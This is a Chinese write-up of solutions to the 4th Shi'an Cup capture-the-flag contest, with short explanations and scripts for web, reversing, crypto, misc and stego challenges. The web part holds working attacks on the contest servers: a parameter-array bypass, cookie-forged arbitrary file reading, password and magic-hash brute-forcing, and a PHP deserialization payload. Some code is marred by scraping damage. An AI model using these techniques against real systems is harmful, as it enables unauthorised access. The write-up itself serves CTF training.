第四届世安杯
哎,水题一堆,还大都都是原题,进了线下赛也没时间去,太赶了
WEB
ctf入门级题目
$flag = '*********';
if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
echo 'You password must be alphanumeric
';
else if (strpos ($_GET['password'], '--') !== FALSE)
die($flag);
else
echo 'Invalid password
';
}
?>
class="login">
<div class="title">
<a href="./index.phps">View Sourcea >
div>
<form method="POST">
<input type="text" required name="password" placeholder="Password" /><br/>
<input type="submit"/>
form>
section>
body>
html>由于需要绕过ereg,又必须存在– 简单
http://ctf1.shiyanbar.com/shian-rao/?password[]=--
flag{Maybe_using_rexpexp_wasnt_a_clever_move}
曲奇饼
一看后面的file是文件名的base64加密,应该可以读取任意文件代码,由于line是来控制显示行数,所以写个脚本
import requests
url = "http://ctf1.shiyanbar.com/shian-quqi/index.php?line={0}&file=aW5kZXgucGhw"
for i in range(0,20):
url1 = url.format(i)
s = requests.get(url1)
print s.text得到index.php代码
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=a2V5LnR4dA==");
$file_list = array(
'0' =>'key.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){
$file_list[2]='thisis_flag.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>简单,就是加一个cookies
flag{UHGgd3rfH*(3HFhuiEIWF}
类型
简单的代码审计,x1就是不能是全数字又能大于2017,那就是2018a
第二个就是根据情况构造数组,第三个需要爆破
脚本
import random
import string
import hashlib
import base64
import re
def md5(str):
m = hashlib.md5()
m.update(str)
return m.hexdigest()
i = 0
while 1:
i +=1
#print i
string = 'XIPU'
string2=''
#print string
s = string+string2.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890',4))
print s,md5(s)[8:24],md5("15562")[8:24]
if (re.findall('^0e[0-9]{14,14}$',md5(s)[8:24])):
print s
break
CTF{Php_1s_bstl4_1a}
登录
额,明显就是爆破密码
脚本
import requests
cookies = {
"PHPSESSID":"baukg3luocsduh2a1khcqoshh2"
}
for i in range(0,10):
for j in range(0,10):
for k in range(0,10):
for m in range(0,10):
for n in range(0,10):
num1 = str(i)+str(j)+str(k)+str(m)+str(n)
url1 = "http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={0}&randcode={1}"
url = "http://ctf1.shiyanbar.com/shian-s/"
s = requests.get(url,cookies=cookies)
string = s.text
num = string.find("randcode")
print num
num2 = string[num+30:num+33]
print string[num+30:num+33]
url2 = url1.format(num1,num2)
print url2
s2 = requests.get(url2,cookies=cookies)
if "{" in s2.content:
print s2.content
exit(0)
#print string[num+16::3]
flag{U1tkOdgutaVWucdy2AbDWXPGkDx9bS2a}
admin
先是利用php伪协议写入
然后发现后面有一个文件包含,直接读取class.php的源码
构造一下序列化
class Read{//f1a9.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
$a = new Read();
$a->file="f1a9.php";
echo serialize($a);
?>
flag_Xd{hSh_ctf:e@syt0g3t}
杂项
reverseMe
查看16进制,发现最后是jpg的文件头
直接写一个脚本逆过来即可
f = open("C:/Users/lanlan/Desktop/reverseMe",'rb')
g = open("C:/Users/lanlan/Desktop/flag.png",'wb')
g.write(f.read()[::-1])
f.close()
g.close()
反过来即可
flag{4f7548f93c7bef1dc6a0542cf04e796e}
珍妮的qq号
数学题
for i in range(10000,100000):
str1 = str(i)
str2 = str1[::-1]
print i,str2
if i*4 == int(str2):
print int(str2)
break跑出来既是结果87912
心仪的公司
流量报,里面的conf1g.php是上传webshell的,查找发现又异常图片下载
fl4g:{ftop_Is_Waiting_4_y}
逆向
android
分析反编译代码可知,需要用特定的广播信息触发apk的相关Activity
关键信息是extra中的msg值为:OpenSesame,可以调用adb的root权限下的am工具
点击BROADCAST按钮,apk会发出一条广播,而广播内容即是将相关字符串处理后的关键内容
为了接收该广播,创建了一个广播接收器:
主要代码如下:
intentFilter = new IntentFilter();
intentFilter.addAction("com.flagstore.ctf.OUTGOING_INTENT");
receiver = new NetworkChangeReceiver();
registerReceiver(receiver, intentFilter); class NetworkChangeReceiver extends BroadcastReceiver{
@Override
public void onReceive(Context context,Intent intent){
Toast.makeText(context, "getMessage"+intent.getStringExtra("msg"), Toast.LENGTH_SHORT).show();
}
}
}将该广播接收器安装到手机上并开启
当点击BROADCAST后,会显示接收到的消息:
得到flag
get_flag
输入之后找算法,就在这里:
关键就是那个比较,其中eax的计算根据输入计算得到的,exc在内存中提出来的,看懂之后写算法:
a = [0xB9 ,0x3A,0xA9,0xD8,0x15, 0x8A, 0xE7 ,0x42,0x69, 0x90, 0xCA, 0xA3, 0x4D, 0xD8, 0xD9, 0xC9 ]
f = ""
for i in range(16):
for j in range(33,128):
if ((2*j-6)^j)-2*i==a[i]:
f += chr(j)
break
print fflag:mBqL!zS6-hLm)XY_
简单算法
这题有点脑洞,根据题目可以算出来很多password(准确来讲智能确定其中9位),我们可以自己计算要异或的值,然后确定完整的flag:
这是计算异或值的代码:
#include然后根据完整的要异或的值,算出完整的flag:
a = "5FF25E8B4E0EA3AAC793813D5F74A309912B49289367"
a = [ord(i) for i in a.decode("hex")]
print len(a)
n = [0x11,0xa,0x11,0xd,0x1,0x0f,0x0,0x6,0x3,0x1]
xor =[0x39,0x9e,0x3f,0xec,0x35,0x6a,0x9b,0x98,0xf1,0xf6,0xb7,0x4,0x6d,0x42,0x93,0x30,0xa9,0x4e,0x2f,0x1c,0xa5,0x1a]
f = ['a','a','a','a','{','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','}']
r = ""
print len(f)
for i in range(22):
f[i] = chr(a[i]^xor[i])
for i in range(len(f)):
r += f[i]
print r
flag:flag{d826e6926098ef46}
console
这是.NET的逆向,有原题。
Reflector打开后export出来,用VS看一下代码:
程序大概流程就是将 CreateByTenshine 字符串进行加密后和输入比较,加密也很简单,是和[0x2, 0x3, 0x5, 0x7, 0xb, 0xd, 0x11, 0x13, 0x17, 0x1d, 0x1f, 0x25, 0x29, 0x2b,0x2f, 0x35,0x3b, 0x3d, 0x43, 0x47, 0x49, 0x4f, 0x53, 0x59, 0x61, 0x65, 0x67,0x6b, 0x6d, 0x71] 里的第二个至第15个数轮流异或,把 – 删掉,然后计算md5值。
import hashlib
str1 = [0x2, 0x3, 0x5, 0x7, 0xb, 0xd, 0x11,0x13, 0x17, 0x1d, 0x1f, 0x25, 0x29, 0x2b, 0x2f, 0x35,0x3b, 0x3d, 0x43, 0x47,0x49, 0x4f, 0x53, 0x59, 0x61, 0x65, 0x67, 0x6b, 0x6d, 0x71]
str2 = "CreateByTenshine"
str3 = ""
for i in xrange(len(str2)):
t= ord(str2[i])
for j in range(1,15):
t = str1[j] ^ t
str3 += chr(t)
for k in xrange(len(str3)):
if (str3[k] == '-'):
str3[k] = ''
print str3
m = hashlib.md5()
m.update(str3)
result = m.hexdigest()
print 'flag{' + result + '}'
最后flag:flag{967DDDFBCD32C1F53527C221D9E40A0B}
bin
64位的ELF文件,sub_40084A函数会进行反调试,动态调的时候改下eax就好:
再看主函数,关键是sub_40074D函数判断:
动态找到qword_601080的地址:
在一开始的时候建好了一个数组,从n到w,然后通过输入字符串,看是否在数组应该在的位置(5、2、7、2、5、6),最后比对在这个位置:
所以,结合创建的数组,最后结果就是rotors:
动态暴力破解
题目IDA反汇编代代码看的很不舒服,因为用的是C++ STL库进行操作的,导致一些函数名很长。搜索一些string找到了类似flag(有左右花括号)的字符串:
走一下流程,输入位置下断:
然后在内存中找到了硬编码的字符串:dfhlnrtxdflprvbhjptvbhjptvbfltxzdfjxbhj
然后走下来,输入被 sub_401210加密了一下,加密后与加密前长度一样,但是不是普通的凯撒,因为相同的输入与输出不一样,不过在加密的过程中,用到了这个字符串,猜测flag是经过该字符串加密后成了现在这个样子:FYM-OI}olte_zi_wdqedd_djrzuj_shgmEDFqo{
然后写写脚本跑一下:
s1 = 'FYM-OI}olte_zi_wdqedd_djrzuj_shgmEDFqo{'
s2 = 'dfhlnrtxdflprvbhjptvbhjptvbfltxzdfjxbhj'
s1 = list(s1)
for i in range(len(s1)):
pos = ord(s2[i])-ord('a')
if s1[i]=='{':
s1[i]='}'
elif s1[i]=='}':
s1[i]='{'
elif s1[i]=='_':
pass
else:
if s1[i].islower():
s1[i] = chr(ord(s1[i])-pos%26)
if ord(s1[i])<ord('a'):
s1[i] = chr(ord(s1[i])+26)
elif s1[i].isupper():
s1[i] = chr(ord(s1[i])-pos%26)
if ord(s1[i])<ord('A'):
s1[i] = chr(ord(s1[i])+26)
else:
pass
f = ""
print s1
for i in range(len(s1)):
f+=s1[i]
print f
这是flag:
密码学
rsa
这个就是给了,n,c然后e应该是3,这样的话直接利用bystudent师傅的脚本即可
from libnum import s2n,n2s
from gmpy2 import iroot
n = 92164540447138944597127069158431585971338721360079328713704210939368383094265948407248342716209676429509660101179587761913570951794712775006017595393099131542462929920832865544705879355440749903797967940767833598657143883346150948256232023103001435628434505839331854097791025034667912357133996133877280328143
e = 3
c = 2044619806634581710230401748541393297937319
i = 0
while 1:
res = iroot(c+i*n,3)
if(res[1] == True):
print res
break
print "i="+str(i)
i = i+1
m = 126922179506039
print n2s(m)so_low
隐写
low
做过的原题,用stegsolve分析无果,但是通过观察发现是RGB的通道有问题,直接套用脚本
# -*- coding: utf8 -*-
#low
import Image
def foo():
im=Image.open('C:/Users/lanlan/Desktop/low.bmp')
im2=im.copy()
pix=im2.load()
width,height=im2.size
for x in xrange(0,width):
for y in xrange(0,height):
#LSB
if pix[x,y]&0x1==0:
pix[x,y]=255 #
else:
pix[x,y]=0
im2.show()
pass
if __name__ == '__main__':
foo()
print 'ok'
pass
flag{139711e8e9ed545e}
斑马斑马
这题也简单,把斑马身上的条纹处理一下,可得到条码,扫描即可
FLAG IS TENSHINE
坑的flag居然是小写
tenshine
CreateByWho
一堆碎片,用ps拼起来
Create-By-SimpleLab
适合作为桌面的图片
首先是一张图片,然后用StegSolve进行分析,发现二维码
扫码得到一串字符
03F30D0A79CB05586300000000000000000100000040000000730D0000006400008400005A000064010053280200000063000000000300000016000000430000007378000000640100640200640300640400640500640600640700640300640800640900640A00640600640B00640A00640700640800640C00640C00640D00640E00640900640F006716007D00006410007D0100781E007C0000445D16007D02007C01007400007C0200830100377D0100715500577C010047486400005328110000004E6966000000696C00000069610000006967000000697B000000693300000069380000006935000000693700000069300000006932000000693400000069310000006965000000697D000000740000000028010000007403000000636872280300000074030000007374727404000000666C6167740100000069280000000028000000007304000000312E7079520300000001000000730A0000000001480106010D0114014E280100000052030000002800000000280000000028000000007304000000312E707974080000003C6D6F64756C653E010000007300000000
猜测是16进制,头像pyc的头部,直接保存反编译记得原python代码
#!/usr/bin/env python
# encoding: utf-8
# 访问 http://tool.lu/pyc/ 查看更多信息
def flag():
str = [
102,
108,
97,
103,
123,
51,
56,
97,
53,
55,
48,
51,
50,
48,
56,
53,
52,
52,
49,
101,
55,![enter description here][32]
125]
flag = ''
for i in str:
flag += chr(i)
print flag
flag()flag{38a57032085441e7}